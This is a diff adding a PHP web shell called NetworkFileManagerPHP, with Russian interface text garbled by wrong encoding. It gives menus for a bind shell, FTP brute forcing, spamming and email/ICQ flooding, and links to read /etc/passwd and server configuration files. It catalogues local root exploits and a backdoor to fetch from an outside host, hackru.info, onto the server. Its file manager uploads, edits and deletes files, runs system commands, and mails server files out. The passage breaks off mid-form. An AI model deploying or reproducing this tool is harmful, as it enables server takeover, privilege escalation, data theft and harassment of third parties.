+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=bash'>.:îòêğûòü øåë</a>&nbsp;&nbsp;</td>
+<td $style_open align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=exploits'>.:Explots</a>&nbsp;&nbsp;</td>
+<tr>
+<td class=pagetitle align=center width='85%'><font color=#AB879C><b>Õàêåğñêèé ñîôò:</b></font></td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=crypte'>.:Øèôğîâêà</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=decrypte'>.:Ğàñøèôğîâêà</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=brut_ftp'>.:Full access FTP</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=spam'>.:Ñïàìåğ</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a  class=menu href='$PHP_SELF?action=down'>.:Óäàëåííàÿ çàãğóçêà</a>&nbsp;&nbsp;</td>
+</tr>
+<td class=pagetitle align=center width=85%><font color=#FF3300><b>Ñîôò íàêàçàíèÿ:</b></font></td>
+<td $style2 align=center width='15%' colspan=2><a class=menu href='$PHP_SELF?action=flud'>.:Ôëóä Email</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' colspan=3><a  class=menu href='$PHP_SELF?action=fludicq'>.:Ôëóä ICQ</a>&nbsp;&nbsp;</td>
+<tr>
+<tr>
+<td class=pagetitle align=center width='85%' colspan=6 bgcolor=#76A8AB>$sob&nbsp;&nbsp;ID:<u><b>$id</b></u></td>
+</tr>
+<tr>
+<td $style2 align=center width='15%' colspan=2><a class=menu href="$PHP_SELF?tm=/etc&fi=passwd&action=view">.:etc/passwd</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href = '$PHP_SELF?tm=/var/cpanel&fi=accounting.log&action=view'>.:cpanel log</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/usr/local/apache/conf&fi=httpd.conf&action=view'>.:httpd.conf[1]</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='$PHP_SELF?tm=/etc/httpd&fi=httpd.conf&action=view'>.:httpd.conf[2]</a>&nbsp;&nbsp;</td>
+<td $style2 align=center width='15%' ><a class=menu href='http://hackru.info/bugtraq'>.:Bugtraq</td>
+
+</tr>
+</table>
+html;
+/* çàäàåì ğàíäîìíûå íàçâàíèÿ ôàéëîâ àğõèâàöèè*/
+$CHARS = "abcdefghijklmnopqrstuvwxyz";
+for ($i=0; $i<6; $i++)  $pass .= $CHARS[rand(0,strlen($CHARS)-1)];
+
+/* çàäàåì ïóòü ê ñàéòó, ãäå ëåæàò ïóáëè÷íûå ıêñïëîéòû*/
+$public_site = "http://hackru.info/adm/exploits/public_exploits/"; 
+/* $public_site = "http://localhost/adm/public_exploits/"; */
+/* Ïóáëè÷íûå ıêñïëîéòû */
+$public[1] = "s"; // øåë
+$title_ex[1] = "
+&nbsp;&nbsp;bindtty.c - óäàëåííûé øåë ñ ïğàâàìè apache, äàííûé áàêäîğ óæå ñêîìïèëèğîâàí è íàñòğîåí íà 4000 ïîğò<br>
+<dd><b>Çàïóñê:</b> ./s<br>
+&nbsp;&nbsp;&nbsp;Êîíåêòèòñÿ ëó÷øå òåëíåò êëèåíòîì ñàìûå ëó÷øèå ıòî <u><b>putty</b></u> è <u><b>SecureCRT</b></u>
+";
+$public[2] = "m"; // ìğåìàï
+$title_ex[2] = "
+&nbsp;&nbsp;MREMAP - ïîçâîëÿåò ïîëó÷èòü ëîêàëüíî ïğèâèëåãèè ROOT, èñïîëüçóåò ïåğåïîëíåíèå ïàìÿòè.<br>
+<dd><b>Çàïóñê:</b> ./m<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$public[3] = "p"; // ptrace
+$title_ex[3] = "
+&nbsp;&nbsp;PTRACE - ñòàğûé äîáğûé ıêñïëîéò, ğàáîòàåò òàêæå êàê è mremap<br>
+<dd><b>Çàïóñê:</b> ./p<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$public[4] = "psyBNC2.3.2-4.tar.gz"; // psybnc
+$title_ex[4] = "
+&nbsp;&nbsp;psyBNC - ïîñëåäíÿÿ âåğñèÿ, ïîïóëÿğíîãî áàóí÷åğà äëÿ IRC<br>
+<dd><b>Ğàçàğõèâàöèÿ:</b> tar -zxf psyBNC2.3.2-4.tar.gz // ïîÿâèòñÿ ïàïêà <u>psybnc</u><br>
+<dd><b>Âõîä è çàïóñê:</b> make // óñòàíàâëèâàåì íà äàííóş îñü psybnc // ./psybnc // ìîæíî ïîìåíÿòü êîíôèã ñ ïîìîùüş nfm<br>
+&nbsp;&nbsp;&nbsp;Ìîæíî çàïóñêàòü ñ ïğàâàìè àïà÷à!!! Òîëüêî ñìîòğèòå ÷òîáû íå áûëî ôàåğâîëà!!!
+";
+/* Ïğèâàòíûå ıêñïëîéòû */
+$private[1] = "brk"; // localroot root linux 2.4.*
+$title_exp[1] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ïğèâàòíûé ñïëîéò, äàşùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ğàáîòàåò òàêæå êàê è mremap<br>
+<dd><b>Çàïóñê:</b> ./brk<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[2] = "dupescan"; // Glftpd DupeScan Local Exploit by RagnaroK
+$title_exp[2] = "
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - ïğèâàòíûé ñïëîéò, äàşùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ãäå çàïóùåí ñåğâèñ Glftpd <br>
+<dd>Èìååòñÿ 2 ôàéëà: <b>dupescan</b> è <b>glftpd</b> Äëÿ ïîëó÷åíèÿ root ïğàâ, íåîáõîäèìî çàïèñàòü ôàéë dupescan â äåğèêòîğèş<br>
+/glftpd/bin/ êîìàíäîé <u>cp dupescan /glftpd/bin/</u>, ïîñëå ÷åãî èç bash øåëà çàïóñòèòü <u>./glftpd</u>. Ğóò âàì îáåñïå÷åí!!!<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[3] = "glftpd";
+$title_exp[3] = "
+&nbsp;&nbsp;lGlftpd DupeScan Local Exploit - ïğèâàòíûé ñïëîéò, äàşùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ãäå çàïóùåí ñåğâèñ Glftpd <br>
+Âòîğàÿ ÷àñòü ıêñïëîéòà<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[4] = "sortrace";
+$title_exp[4] = "
+&nbsp;&nbsp;Traceroute v1.4a5 exploit by sorbo - ïğèâàòíûé ñïëîéò, äàşùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ÷åğåç ñåğâèñ traceroute<br>
+<dd><b>Çàïóñê:</b> ./sortrace<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[5] = "root";
+$title_exp[5] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ïğèâàòíûé ñïëîéò, äàşùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ğàáîòàåò òàêæå êàê è ìğåìàï<br>
+<dd><b>Çàïóñê:</b> ./root<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[6] = "sxp";
+$title_exp[6] = "
+&nbsp;&nbsp;Sendmail 8.11.x exploit localroot - ïğèâàòíûé ñïëîéò, äàşùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ğàáîòàåò òàêæå êàê è ìğåìàï<br>
+<dd><b>Çàïóñê:</b> ./sxp<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[7] = "ptrace_kmod";
+$title_exp[7] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ïğèâàòíûé ñïëîéò, äàşùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ğàáîòàåò òàêæå êàê è ìğåìàï, èñïîëüçóåò áàãó ÷åğåç ptarce + kmod<br>
+<dd><b>Çàïóñê:</b> ./ptrace_kmod<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+$private[8] = "mr1_a";
+$title_exp[8] = "
+&nbsp;&nbsp;localroot root linux 2.4.* - ïğèâàòíûé ñïëîéò, äàşùèé ROOT íà ëèíóêñîïîäîáíûõ òà÷êàõ, ğàáîòàåò òàêæå êàê è ìğåìàï, ğàáîòàåò òàêæå êàê è ìğåìàï<br>
+<dd><b>Çàïóñê:</b> ./mr1_a<br>
+&nbsp;&nbsp;&nbsp;Çàïóñêàòü òîëüêî èç ïîä bash øåëà!!!
+";
+/* çàäàåì ïóòü ê ñàéòó, ãäå ëåæàò ïğèâàòíûå ıêñïëîéòû */
+$private_site = "http://hackru.info/adm/exploits/private_exploits/";
+endif;
+
+/* Äàëüøå íè÷åãî íå èçìåíÿòü âî èçáåæàíèè íåğàáîòîñïîñîáíîñòè ñêğèïòà */
+global $action,$tm,$cm;
+
+function getdir() {
+ global $gdir,$gsub,$i,$j,$REMOTE_ADDR,$PHP_SELF;
+ $st = getcwd();
+ $st = str_replace("\\","/",$st);
+ $j = 0;
+ $gdir = array();
+ $gsub = array();
+ print("<br>");
+ for ($i=0;$i<=(strlen($st)-1);$i++) {
+  if ($st[$i] != "/") {
+   $gdir[$j] = $gdir[$j].$st[$i];
+   $gsub[$j] = $gsub[$j].$st[$i];
+  } else {
+   $gdir[$j] = $gdir[$j]."/";
+   $gsub[$j] = $gsub[$j]."/";
+   $gdir[$j+1] = $gdir[$j];
+   $j++;
+  }
+ }
+ print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#ffffcc BORDER=1 width=50% align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=left><b>&nbsp;&nbsp;Òåêóùàÿ äèğåêòîğèÿ: </b>");
+ for ($i = 0;$i<=$j;$i++) print("<a href='$PHP_SELF?tm=$gdir[$i]'>$gsub[$i]</a>");
+ $free = tinhbyte(diskfreespace("./"));
+ print("</td></tr><tr><td align=left><b>&nbsp;&nbsp;Äîñòóïíîå äèñêîâîå ïğîñòğàíñòâî</b> : <font face='Tahoma' size='1' color='#000000'>$free</font></td></tr>");
+ print("<tr><td align=left><b>&nbsp; ".exec("uname -a")."</b></td></tr>");
+ print("<tr><td align=left><b>&nbsp;&nbsp;Âàø IP:&nbsp;&nbsp;</b><font face='Tahoma' size='1' color='#000000'>$REMOTE_ADDR &nbsp; $HTTP_X_FORWARDED_FOR</font></td></tr>");
+ print("<tr><td align=left><b>&nbsp;&nbsp;Èíôà î æåëåçå:(GHz)</b> ".exec("cat /proc/cpuinfo | grep GHz")."</td></tr>");
+ print("<tr><td align=left><b><b>&nbsp;&nbsp;Èíôà î æåëåçå:(MHz)</b> ".exec("cat /proc/cpuinfo | grep MHz")."</b></td></tr>");
+ print("<tr><td align=left><b>&nbsp; ".exec("id")."</b></td></tr></table><br>");
+
+}
+
+function tinhbyte($filesize) {
+ if($filesize >= 1073741824) { $filesize = round($filesize / 1073741824 * 100) / 100 . " GB"; }
+ elseif($filesize >= 1048576) { $filesize = round($filesize / 1048576 * 100) / 100 . " MB"; }
+ elseif($filesize >= 1024) { $filesize = round($filesize / 1024 * 100) / 100 . " KB"; }
+ else { $filesize = $filesize . ""; }
+ return $filesize;
+}
+
+function permissions($mode) {
+ $perms  = ($mode & 00400) ? "r" : "-";
+ $perms .= ($mode & 00200) ? "w" : "-";
+ $perms .= ($mode & 00100) ? "x" : "-";
+ $perms .= ($mode & 00040) ? "r" : "-";
+ $perms .= ($mode & 00020) ? "w" : "-";
+ $perms .= ($mode & 00010) ? "x" : "-";
+ $perms .= ($mode & 00004) ? "r" : "-";
+ $perms .= ($mode & 00002) ? "w" : "-";
+ $perms .= ($mode & 00001) ? "x" : "-";
+ return $perms;
+ 
+ 
+}
+
+function readdirdata($dir) {
+ global $action,$files,$dirs,$tm,$supsub,$thum,$style3,$style4,$PHP_SELF;
+ $files = array();
+ $dirs= array();
+ $open = @opendir($dir);
+
+ if (!@readdir($open) or !$open ) echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center class=alert><b>Íåò äîñòóïà.</b></td></tr></table>";
+ else {
+  $open = opendir($dir);
+  while ($file = readdir($open)) {
+   $rec = $file;
+   $file = $dir."/".$file;
+   if (is_file($file)) $files[] = $rec;
+  }
+  sort($files);
+  $open = opendir($dir);
+  $i=0;
+  while ($dire = readdir($open)) {
+   if ( $dire != "." ) {
+    $rec = $dire;
+    $dire = $dir."/".$dire;
+    if (is_dir($dire)) {
+     $dirs[] = $rec;
+     $i++;
+    }
+   }
+  }
+  sort($dirs);
+  print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'center' class=pagetitle><b>Èìÿ</b></td><td width = '10%' align = 'center' class=pagetitle><b>Ğàçìåğ</b></td><td width = '20%' align = 'center' class=pagetitle><b>Äàòà ñîçäàíèÿ</b></td><td width = '10%' align = 'center' class=pagetitle><b>Òèï</b></td><td width = '15%' align = 'center' class=pagetitle><b>Ïğàâà äîñòóïà</b></td><td width = '25%' align = 'center' class=pagetitle><b>Êîììåíòàğèè</b></td></tr></table>");
+  for ($i=0;$i<sizeof($dirs);$i++) {
+   if ($dirs[$i] != "..") {
+    $type = 'Dir';
+    $fullpath = $dir."/".$dirs[$i];
+    $time = date("d/m/y H:i",filemtime($fullpath));
+    $perm = permissions(fileperms($fullpath));
+    $size = tinhbyte(filesize($fullpath));
+    $name = $dirs[$i];
+    $fullpath = $tm."/".$dirs[$i];
+    if ($perm[7] == "w" && $name != "..") $action = "
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=uploadd'>Çàãğóçèòü</a></td>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$tm&dd=$name&action=deldir'>Óäàëèòü</a></td>
+	</tr>
+	<tr>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=newdir'>Íîâàÿ äèğåêòîğèÿ</a></td>
+	<td align=center $style3><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Àğõèâàöèÿ ïàïêè</a></td>
+	</tr></table>";
+    else $action = "<TABLE CELLPADDING=0 CELLSPACING=0 width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><b>Òîëüêî ÷òåíèå</b></td><td align=center $style2><a href ='$PHP_SELF?tm=$fullpath&action=arhiv'>Àğõèâàöèÿ ïàïêè</a></td></tr></table>";
+    print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#33CCCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><a href = '$PHP_SELF?tm=$fullpath'><b><i>$name</i></b></a></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'left'>$action</td></tr></table>");
+   }
+  }
+  for ($i=0;$i<sizeof($files);$i++) {
+   $type = 'File';
+   $fullpath =  $dir."/".$files[$i];
+   $time = date("d/m/y H:i",filemtime($fullpath));
+   $perm = permissions(fileperms($fullpath));
+   $size = tinhbyte(filesize($fullpath));
+   $owner = @chown($fullpath, "nobody");
+   if ( $perm[6] == "r" ) $act = "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=view'>Ïğîñìîòğ</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download'>Ñêà÷êà</a></td></tr>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=download_mail'>Íà ìûëî</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=copyfile'>Êîïèğîâàòü</a></td>
+   </tr></table>";
+   if ( $owner == "nobody" ) $act .= "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#98FAFF width=100% BORDER=1 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+   <tr><td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=edit'>Ğåäàêòèğîâàòü</a></td>
+   <td align=center $style4><a href='$PHP_SELF?tm=$dir&fi=$files[$i]&action=delete'>Óäàëèòü</a></td>
+   </tr></table>";
+   print("<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#FFFFCC BORDER=1 width=760 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td width = '20%' align = 'left'><b>$files[$i]</b></font></td><td width = '10%' align = 'center'>$size</td><td width = '20%' align = 'center'>$time</td><td width = '10%' align = 'center'>$type</td><td width = '15%' align = 'center'>$perm</td><td width = '25%' align = 'center'>$act</td></tr></table>");
+  }
+ }
+}
+
+function html() {
+global $ver,$meta,$style;
+echo "
+<html>
+<head>
+<title>NetworkFileManagerPHP</title>
+</head>
+<body bgcolor=#86CCFF leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
+";
+}
+
+# ïğîñìîòğ ôàéëà
+function viewfile($dir,$file) {
+
+ $buf = explode(".", $file);
+ $ext = $buf[sizeof($buf)-1];
+ $ext = strtolower($ext);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ 
+ switch ($ext) {
+  case "jpg":
+    
+	header("Content-type: image/jpeg");
+    readfile($fullpath);
+    break;
+    case "jpeg":
+	
+    header("Content-type: image/jpeg");
+    readfile($fullpath);
+    break;
+    case "gif":
+	
+    header("Content-type: image/gif");
+    readfile($fullpath);
+    break;
+	 
+	 case "png":
+	
+    header("Content-type: image/png");
+    readfile($fullpath);
+    break;
+    default:
+	
+	 case "avi":	
+    header("Content-type: video/avi");
+    readfile($fullpath);
+
+    break;
+    default:
+	
+	 case "mpeg":	
+    header("Content-type: video/mpeg");
+    readfile($fullpath);
+    break;
+    default:
+	
+	 case "mpg":	
+    header("Content-type: video/mpg");
+    readfile($fullpath);
+    break;
+    default:
+		
+    html();
+	chdir($dir);
+    getdir();
+	
+   echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td align=center><font color='#FFFFCC' face='Tahoma' size = 2>Ïóòü äî Ôàéëà:</font><font color=white  face ='Tahoma' size = 2>$fullpath</font></td></tr></table>";
+   $fp = fopen($fullpath , "r");
+   while (!feof($fp)) {
+    $char = fgetc($fp);
+    $st .= $char;
+   }
+
+   $st = str_replace("&", "&amp;", $st);
+   $st = str_replace("<", "&lt;", $st);
+   $st = str_replace(">", "&gt;", $st);
+
+   $tem = "<p align='center'><textarea wrap='off' rows='20' name='S1' cols='90' class=inputbox>$st</textarea></p>";
+   echo $tem;
+   fclose($fp);
+   break;
+ }
+}
+
+# îòïğàâêà ôàéëà íà ìûëî
+function download_mail($dir,$file) {
+ global $action,$tm,$cm,$demail, $REMOTE_ADDR, $HTTP_HOST, $PATH_TRANSLATED;
+ $buf = explode(".", $file);
+ $dir = str_replace("\\","/",$dir);
+ $fullpath = $dir."/".$file;
+ $size = tinhbyte(filesize($fullpath));
+ $fp = fopen($fullpath, "rb");
+ while(!feof($fp))
+
+  $attachment .= fread($fp, 4096);
+  $attachment = base64_encode($attachment);
+  $subject = "NetworkFileManagerPHP  ($file)";
+  
+  $boundary = uniqid("NextPart_");
+  $headers = "From: $demail\nContent-type: multipart/mixed; boundary=\"$boundary\"";
+
+  $info = "---==== Ñîîáùåíèå îò ($demail)====---\n\n";
+  $info .= "IP:\t$REMOTE_ADDR\n";
+  $info .= "HOST:\t$HTTP_HOST\n";
+  $info .= "URL:\t$HTTP_REFERER\n";
+  $info .= "DOC_ROOT:\t$PATH_TRANSLATED\n";
+  $info .="--$boundary\nContent-type: text/plain; charset=iso-8859-1\nContent-transfer-encoding: 8bit\n\n\n\n--$boundary\nContent-type: application/octet-stream; name=$file \nContent-disposition: inline; filename=$file \nContent-transfer-encoding: base64\n\n$attachment\n\n--$boundary--";
+
+  $send_to = "$demail";             
+   
+  $send = mail($send_to, $subject, $info, $headers);
+  
+  if($send == 2)  
+   echo "<br>
+	<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+	<tr><td align=center>
+	<font color='#FFFFCC' face='Tahoma' size = 2>Ñïàñèáî!!!Ôàéë <b>$file</b> îòïğàâëåí âàì íà <u>$demail</u>.</font></center></td></tr></table><br>";
+
+fclose($fp);
+ }
+
+
+
+function copyfile($dir,$file) {
+ global $action,$tm;
+ $fullpath = $dir."/".$file;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Èìÿ ôàéëà :</font><font color = 'black' face ='Tahoma' size = 2>&nbsp;<b><u>$file</u></b>&nbsp; ñêîïèğîâàí â äåğèêòîğèş &nbsp;<u><b>$dir</b></u></font></center></td></tr></table>";
+ if (!copy($file, $file.'.bak')){
+   echo (" íåìîãó ñêîïèğîâàòü ôàéë $file");
+   }
+}
+
+
+# ğåäàêòèğîâàíèå ôàéëà
+function editfile($dir,$file) {
+ global $action,$datar;
+ $fullpath = $dir."/".$file;
+ chdir($dir);
+ getdir();
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Èìÿ ôàéëà :</font><font color = 'black' face ='Tahoma' size = 2>$fullpath</font></center></td></tr></table>";
+ $fp = fopen($fullpath , "r");
+ while (!feof($fp)) {
+  $char = fgetc($fp);
+  $st .= $char;
+ }
+ $st = str_replace("&", "&amp;", $st);
+ $st = str_replace("<", "&lt;", $st);
+ $st = str_replace(">", "&gt;", $st);
+ $st = str_replace('"', "&quot;", $st);
+ echo "<form method='POST' action='$PHP_SELF?tm=$dir&fi=$file&action=save'><p align='center'><textarea rows='14' name='S1' cols='82' class=inputbox>$st</textarea></p><p align='center'><input type='submit' value='Ïîåõàëè' name='save' class=button1 $style_button></p><input type = hidden value = $tm></form>";
+ $datar = $S1;
+ 
+}
+
+# çàïèñü ôàéëà
+function savefile($dir,$file) {
+ global $action,$S1,$tm;
+ $fullpath = $dir."/".$file;
+ $fp = fopen($fullpath, "w");
+ $S1 = stripslashes($S1);
+ fwrite($fp,$S1);
+ fclose($fp);
+ chdir($dir);
+ echo "<TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>$fullpath</b> îòğåäàêòèğîâàí.</font></td></tr></table>";
+ getdir();
+ readdirdata($tm);
+}
+
+# óäàëåíèå äåğèêòîğèè
+function deletef($dir)
+{
+ global $action,$tm,$fi;
+ $tm = str_replace("\\\\","/",$tm);
+ $link = $tm."/".$fi;
+ unlink($link);
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# çàãğóçêà ôàéëà
+function uploadtem() {
+ global $file,$tm,$thum,$PHP_SELF,$dir,$style_button;
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=500 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><form enctype='multipart/form-data' action='$PHP_SELF?tm=$dir&action=upload' method=post><tr><td align=left valign=top colspan=3 class=pagetitle><b>Çàãğóçêà ôàéëà:</b></td></tr><tr><td><input type='hidden' name='tm' value='$tm'></td><td><input name='userfile' type='file' size=48 class=inputbox></td><td><input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr></form></table>";
+}
+
+function upload() {
+ global $HTTP_POST_FILES,$tm;
+ echo $set;
+ copy($HTTP_POST_FILES["userfile"][tmp_name], $tm."/".$HTTP_POST_FILES["userfile"][name]) or die("Íå ìîãó çàãğóçèòü ôàéë".$HTTP_POST_FILES["userfile"][name]);
+ echo "<br><TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#0066CC BORDER=1 width=300 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white><tr><td><center><font color='#FFFFCC' face='Tahoma' size = 2>Ôàéë <b>".$HTTP_POST_FILES["userfile"][name]."</b> óñïåøíî çàãğóæåí.</font></center></td></tr></table>";
+ @unlink($userfile);
+ chdir($tm);
+ getdir();
+ readdirdata($tm);
+}
+
+# çàêà÷êà ıêñïëîéòîâ
+function upload_exploits() {
+ global $PHP_SELF,$style_button, $public_site, $private_site, $public, $title_ex, $style_open, $private, $title_exp;
+ 
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Ïóáëè÷íûå ıêñïëîéòû:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>BASH øåë</b> - bindtty.c (ôàéë çàïóñêà <u>s</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[1]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[1]'>
+ <input type='hidden' name='file2' value='$public[1]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - mremap (ôàéë çàïóñêà <u>m</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[2]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[2]'>
+ <input type='hidden' name='file2' value='$public[2]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+ echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>Local ROOT for linux 2.6.20</b> - ptrace (ôàéë çàïóñêà <u>p</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[3]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[3]'>
+ <input type='hidden' name='file2' value='$public[3]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+  echo "
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
+ &nbsp;&nbsp;<b>psyBNC âåğñèÿ:2.3.2-4</b> - psyBNC (ôàéë çàïóñêà <u>./psybnc</u>)</td></tr>
+ <tr>
+ <td class=pagetitle width=500>&nbsp;$title_ex[4]</td>
+ <td width=100><input type='hidden' name='file3' value='$public_site$public[4]'>
+ <input type='hidden' name='file2' value='$public[4]'>
+ <input type='submit' value='Çàãğóçèòü ôàéë' class=button1 $style_button></td></tr>
+ </form></table>";
+
+ echo "<br>
+ <TABLE CELLPADDING=0 CELLSPACING=0 bgcolor=#184984 BORDER=1 width=600 align=center bordercolor=#808080 bordercolorlight=black bordercolordark=white>
+ <form enctype='multipart/form-data' action='$PHP_SELF?action=exploits&status=ok' method=post>
+ <tr $style_open><td align=left valign=top colspan=3 class=pagetitle>
+ &nbsp;&nbsp;<b>Ïğèâàòíûå ıêñïëîéòû:</b></td></tr>
+ <tr><td align=left valign=top colspan=3 bgcolor=#FFFFCC>
